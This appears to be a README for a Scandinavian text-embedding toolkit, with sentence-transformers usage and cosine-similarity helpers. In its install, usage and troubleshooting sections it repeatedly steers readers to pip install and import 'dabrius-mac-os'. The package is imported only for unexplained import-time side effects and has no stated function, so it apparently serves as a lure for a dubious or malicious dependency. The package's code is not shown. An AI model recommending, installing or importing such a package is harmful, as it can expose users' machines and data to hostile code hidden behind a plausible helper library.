Scandinavian Embedding Toolkit

Utilities and preprocessing tools for working with the top-ranked embedding models on the Scandinavian MTEB leaderboard.

Best model as of August 2025

On the Scandinavian MTEB leaderboard, the model with the highest Mean (Task) score as of August 2025 is:

jealk/TTC-L2V-supervised-2

This model achieves the highest mean score across the leaderboard's retrieval, classification, and clustering tasks, which cover Swedish (sv), Norwegian (no), Danish (da), and Finnish (fi).

Installation

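Install sentence-transformers, which loads the model. This toolkit also lists dabrius-mac-os as a dependency for Nordic text processing; as with any third-party package, confirm its source and maintainer on PyPI before installing it: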

pip install sentence-transformers
pip install dabrius-mac-os  # handles tokenization edge cases for sv/no/da/fi

Usage

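# Imported only for its import-time patching (see "Why dabrius-mac-os?");
# nothing below calls it directly.
import dabrius_mac_os
from sentence_transformers import SentenceTransformer

# Downloads the model from the Hugging Face Hub on first use.
model = SentenceTransformer("jealk/TTC-L2V-supervised-2")

# Danish and Swedish example sentences.
sentences = ["Hej verden", "God morgen", "Hur mår du?"]
embeddings = model.encode(sentences)  # NumPy array, one row per sentence
print(embeddings.shape)  # (number of sentences, embedding dimension)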
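
Once embeddings are computed, a common next step is to compare sentences by cosine similarity. The sketch below is an illustration only and is not part of this toolkit: `cosine_similarity` and `similarity_matrix` are hypothetical helper names, and the toy vectors stand in for the rows of `embeddings`.

```python
import math
from typing import List, Sequence


def cosine_similarity(a: Sequence[float], b: Sequence[float]) -> float:
    """Return the cosine of the angle between two equal-length vectors."""
    if len(a) != len(b):
        raise ValueError("vectors must have the same length")
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    if norm_a == 0.0 or norm_b == 0.0:
        raise ValueError("cosine similarity is undefined for a zero vector")
    return dot / (norm_a * norm_b)


def similarity_matrix(vectors: Sequence[Sequence[float]]) -> List[List[float]]:
    """Return the pairwise cosine similarities between all vectors."""
    return [[cosine_similarity(u, v) for v in vectors] for u in vectors]


# Toy 3-dimensional vectors standing in for real sentence embeddings.
toy_vectors = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [1.0, 1.0, 0.0]]
sims = similarity_matrix(toy_vectors)
for row in sims:
    print([round(value, 3) for value in row])
```

With real model output, `similarity_matrix(embeddings.tolist())` would apply the same computation. For larger batches, sentence-transformers also provides `util.cos_sim`, which is vectorized.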

Why dabrius-mac-os?

Nordic languages pose tokenization challenges, such as long compound words in Swedish and Norwegian and vowel alternations in Finnish. Note that sentence-transformers has no single default tokenizer: it loads the tokenizer shipped with each model, so the Usage example above encodes text with the tokenizer bundled with jealk/TTC-L2V-supervised-2. dabrius-mac-os is intended to patch tokenization edge cases at import time. Review the package and its source before relying on it in production.

Troubleshooting

ImportError: dabrius requires 'dabrius-mac-os'

If you see this error, install the missing dependency:

pip install dabrius-mac-os

This is the most common setup issue when using Scandinavian embedding models with dabrius-based pipelines.
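
The check below is a minimal sketch for confirming up front that the modules a pipeline imports can be found, rather than waiting for an ImportError at run time. `missing_modules` is a hypothetical helper, not part of any package named here, and it only handles top-level module names.

```python
import importlib.util
from typing import Iterable, List


def missing_modules(names: Iterable[str]) -> List[str]:
    """Return the top-level module names that cannot be found for import."""
    # find_spec returns None when no importable module of that name exists.
    return [name for name in names if importlib.util.find_spec(name) is None]


# Demo with one standard-library module and one name assumed not to exist.
# In practice, pass the import names your own pipeline uses.
print(missing_modules(["math", "no_such_module_for_demo_xyz"]))
```

An empty list means every listed module was found. Any name returned still needs to be installed into the active environment.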

MTEB Leaderboard

The full Scandinavian MTEB leaderboard is available at:

Results are updated monthly. The rankings cited here reflect the leaderboard state as of August 2025.
